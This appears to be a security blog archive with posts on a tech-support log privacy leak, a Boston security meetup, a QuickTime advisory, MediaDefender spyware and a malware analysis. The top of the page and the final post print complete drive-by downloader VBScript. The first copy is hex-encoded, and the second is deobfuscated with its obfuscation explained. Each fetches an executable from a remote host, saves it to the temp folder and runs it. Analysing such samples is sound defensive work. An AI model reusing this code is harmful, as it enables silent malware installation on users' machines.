Zeroday 01100100011010010

found this one today:

S="6f6e206572726f7220726573756D65206E6578740d0a6375726C3D22687474703A2F2f78787476622e636E2F6172702f676F"
S=S+"2e657865220D0A666e616D65313D22676F2e657865220D0a666E616d65323D22676F2e766273220D0A536574206466203D20"
S=S+"646f63756D656e742E637265617465456C656d656e7428226f626A65637422290D0a64662E73657441747472696275746520"
S=S+"22636c6173736964222C2022636C7369643A42443936433535362D363541332d313144302D393833412d3030433034464332"
S=S+"39453336220d0a7374723d224d6963726F736F66742E584d4C48545450220D0a5365742078203D2064662e4372656174654F"
S=S+"626A656374287374722c2222290D0a43313d2241646f220d0a43323D2264622e220D0a43333d22737472220d0a43343D2265"
S=S+"616d220D0a737472313d43312643322643332643340d0a737472353D737472310D0a7365742053203d2064662e6372656174"
S=S+"656f626a65637428737472352c2222290d0a532e74797065203d20310D0A737472363D22474554220d0A782e4f70656e2073"
S=S+"7472362c206375726c2c2046616c73650D0a782E53656E640d0a73313D22536372697074220D0a73323D22696e672e220d0A"
S=S+"73333d2246696c65220d0a73343D2253797374656D4f626a656374220d0a73303D73312b73322b73332b73340d0a73657420"
S=S+"46203D2064662e6372656174656F626a6563742873302c2222290D0a73657420746D70203D20462e4765745370656369616C"
S=S+"466f6C6465722832290d0A666e616d65313d20462E4275696c645061746828746D702C666e616d6531290d0A532e6f70656e"
S=S+"0d0a532e777269746520782E726573706F6E7365426f64790D0a532e73617665746F66696c6520666E616d65312c320D0a53"
S=S+"2E636C6f73650d0a666E616D65323D20462E4275696C645061746828746d702c666E616d6532290d0a536574207473203d20"
S=S+"462e4f70656e5465787446696c6528666e616d65322C20322c2054727565290D0a74732e57726974654c696E652022536574"
S=S+"205368656c6c203d204372656174654F626a656374282222577363726970742e5368656c6C222229220d0A73716c3D225368"
S=S+"656c6c2E52756e282222222B666e616d65312b22222229220d0A74732e57726974654C696e652073716C0D0a74732e577269"
S=S+"74654c696E652022736574205368656C6c3D4E6F7468696E67220d0A74732e636C6F73650D0A696620462E46696c65457869"
S=S+"73747328666E616D6531293D74727565207468656e0D0a696620462e46696c6545786973747328666E616d6532293d747275"
S=S+"65207468656e0d0A202020207368613D225368656c6c2e417070220d0a202020207368623d7368610d0a2020202073657420"
S=S+"51203D2064662e6372656174656f626a656374287368622B226C69636174696f6E222C2222290D0A20202020512e5368656C"
S=S+"6C4578656375746520666e616d65322C22222c22222c226f70656E222C300D0a656e642069660D0a656E642069660D0A"


I ran into an awkward situation the other day while debugging an issue with my PDA synch software. I’m in a unique situation where I have an older Windows Mobile based PDA but I’m using a Powerbook for my main computing needs. The two don’t play so nicely together however certain software vendors like MarkSpace pick up the slack with middleware. “The Missing Sync” allows me to bridge this gap and synch the MS hardware with OS X software. I ran into an issue when I inadvertently upgraded to a non-free version (They moved on to 3.0 but I’m content with 2.5 I paid for last year) and while it was giving me errors I decided to try to open an automated tech support ticket. The dialog box that came up notified me that system information was being sent and there was a button to review what would be transmitted. Training with the Stopbadware group made me curious and I pressed the button.

What I saw was unsettling and I’m still trying to determine who is “at fault”. Amid the lines of system diagnostic info was my IM conversations for the last few days. Nothing incredibley personal but nothing that I really wanted the Tech Support Rep at Markspace to read. Definitely nothing that would help them solve any of my PDA synch issues. I realized that the tech support application simply pulled the entire console.log file from my computer which Growl (an increasingly popular notfication app) had been logging my IM conversations to. By default Growl will log every IM, sign on, etc that is shown to console.log.

Note that in this picture I have changed the default away from console.log.

I’m really not sure who should change here. Should Growl stop logging to console.log by default? Should MarkSpace stop pulling the entire console.log file? Who else is doing this as part of their tech support procedures? At the very least users of Growl should change this setting until the dust settles. I’m still in communication with MarkSpace and can say that they are responsive and now very aware of this issue.

This Wednesday will mark the 12th ever beansec! If you haven’t been to one yet or haven’t found time to attend then this is the month to make it.

BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area that meets the third Wednesday of each month.

Come get your grub on. Lots of good people show up. Really.

Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

the Enormous Room in Cambridge:
567 Mass Ave, Cambridge 02139

echo “Credit to Urban Puddle for the guide”
echo “this is the article in script form”
echo “you can cut and paste this entire article into a shell script and run it.”

sudo apt-get update
sudo apt-get dist-upgrade

echo " * There's lots of great documentation for Mongrel here."
echo " * There's an entire wiki devoted to Nginx in English"
echo " * Ezra Zygmuntowicz is the man!"
echo " * Russ Brooks has a great HowTo as well"

day:~ zero$ cat fake_ie.sh
curl -A "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" $1 | less

Just received word that new vulnerabilities exist for Quicktime which can cause infection by simply browsing a website. Don’t let the mitigating circumstances fool you. With the huge number of websites break ins and subsequent iframe injections the chances of a site infecting you is significantly high. An attacker simply doesn’t need to “entice a user” anymore.

Below is the actual text from the Apple advisory:

QuickTime 7.2

CVE-ID: CVE-2007-2295

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted H.264 movie may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in QuickTime’s handling of H.264 movies. By enticing a user to access a maliciously crafted H.264 movie, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of QuickTime H.264 movies. Credit to Tom Ferris of Security-Protocols.com, and Matt Slot of Ambrosia Software, Inc. for reporting this issue.

CVE-ID: CVE-2007-2392

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in QuickTime’s handling of movie files. By enticing a user to access a maliciously crafted movie file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of movie files. Credit to Jonathan ‘Wolf’ Rentzsch of Red Shed Software for reporting this issue.

CVE-ID: CVE-2007-2296

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted .m4v file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in QuickTime’s handling of .m4v files. By enticing a user to access a maliciously crafted .m4v file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of .m4v files. Credit to Tom Ferris of Security-Protocols.com for reporting this issue.

CVE-ID: CVE-2007-2394

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted SMIL file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in QuickTime’s handling of SMIL files. By enticing a user to access a maliciously crafted SMIL file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of SMIL files. Credit to David Vaartjes of ITsec Security Services, working with the iDefense VCP, for reporting this issue.

CVE-ID: CVE-2007-2397

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java, which may allow security checks to be disabled. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing a more accurate permissions check. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2393

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java. This may allow Java applets to bypass security checks in order to read and write process memory. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2396

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java. JDirect exposes interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by removing support for JDirect from QuickTime for Java. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2402

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a malicious website to capture a client’s screen content. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by performing a more accurate access control check.

MediaDefender is a long time “enforcement” agency of the MPAA. Recently they were caught setting up a fake online video site (think YouTube for pirated movies) and now claim the site was only an internal project and that they were the victims of libel. The site was taken down amid controversial blogging and coverage from geek portal Digg.com. Shortly afterwards the DNS registrations were also wiped clean. Ars Technica reports that the site also offered a software package that was purported to “increase download times” but instead “performed searches of the user’s computer for other illegal software and reported its findings back to MediaDefender.” That kind of behavior definitely falls under spyware no matter how noble the intentions are supposed to be. Companies like MediaDefender have already toed the line of what is permissible under law by stalking children and students through networks like bittorrent and now seem to be developing technology to search their hard drives without consent. If anyone has a copy of the software I would be extremely interested in taking a look at what it does and reporting on it.

screenshot of MediaDefender offering commercial movie downloads

screenshot of DNS registration before MediaDefender altered it

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism. In this case an ancient form of encryption called the Windows Scripting Encoder. It was hoped to “protect” source code from prying eyes but as substitution ciphers go this one didn’t really help much. A decoder was written which I found still worked very well for the purposes of this exercise.

<%’**Start Encode**#@~^RhUAAA==@#@[LONG LINES OF CHARS]#@&cSMEAA==^#~@>

The decrypted page contained yet another blob to decode but this time it was simply ASCII character numbers. Ruby made quick work of this using sprintf

characters.each do |character|
message = message + sprintf("%c", character.to_i)
end


<script language="VBScript">
<%@ LANGUAGE = VBScript.Encode %>

<%
AK47="http://EVIL.SITE/xy.exe"

Function rechange(kitty)
str=Split(kitty,",")
T=""
For i = 0 To UBound(str)
T=T+Chr(eval(str(i)))
Next
rechange=T
End Function
T="[LONG STRING OF COMMA SEPARATED DIGITS]"
i=T
execute(rechange(I))
%>

The ending here is predictable. The decoded segment uses ADODB to deliver an executable to the victim and executes it with Application.Shell It did have the look of code which was machine generated and not written by hand. That reeks of a toolkit!
There is an interesting forum post with the quote “rav is rubbish” plus several mentions of this code in Chinese forums.


'11
https="rav is rubbish"
'11
On Error Resume Next
'11
jjyy= "ob"&"je"&"ct"
'11
Set PP=document.createElement(jjyy)
'11
PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"
'11
Set XXX1=PP.CreateObject("M"&"ic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'11
XXX1.Open "G"&"ET", AK47, False
'11
XXX1.Send
'11
ExeName="co"&"mm"&"om"&"d.pif"
'11
CallVbs="ca"&"ll.vbs"
'11
Set XXX2=PP.createobject("Scri"&"p"&"ti"&"ng.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'11
Set XXX3=XXX2.GetSpecialFolder(2)
'11
ExeName=XXX2.BuildPath(XXX3,ExeName)
'11
CallVbs=XXX2.BuildPath(XXX3,CallVbs)
'11
AAA="A"&"d"
'11
CCC="o"&"d"&"b"&"."&"s"&"tre"&"am"
'11
DC=AAA&CCC
'11
Set XXX4=PP.createobject(DC,"")
'11
XXX4.type=1
'11
XXX4.Open
'11
XXX4.Write XXX1.ResponseBody
'11
XXX4.Savetofile ExeName,2
'11
XXX4.Close
'11
XXX4.Type=2
'11
XXX4.Open
'11
XXX4.WriteText "On Error Resume Next"&vbCrLf&"Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set fso = CreateObject(""Scripting.FileSystemObject"")"&vbCrLf&"WScript.Sleep 1000"&vbCrLf&"fso.DeleteFile(WScript.ScriptName)"&vbCrLf&"If fso.FileExists("""&CallVbs&""") Then fso.DeleteFile("""&CallVbs&""")"&vbCrLf&"If fso.FileExists("""&html&""") Then fso.DeleteFile("""&html&""")"
'11
XXX4.Savetofile CallVbs,2
'11
XXX4.Close
'11
GBA="Sh"&"e"&"l"&"l"&"."&"Ap"&"p"&"li"
'11
GBP="ca"&"ti"&"on"
'11
Set APIRun=PP.createobject(GBA&GBP,"")
'22
'33
APIRun.ShellExecute CallVbs,"","","Open",0
'44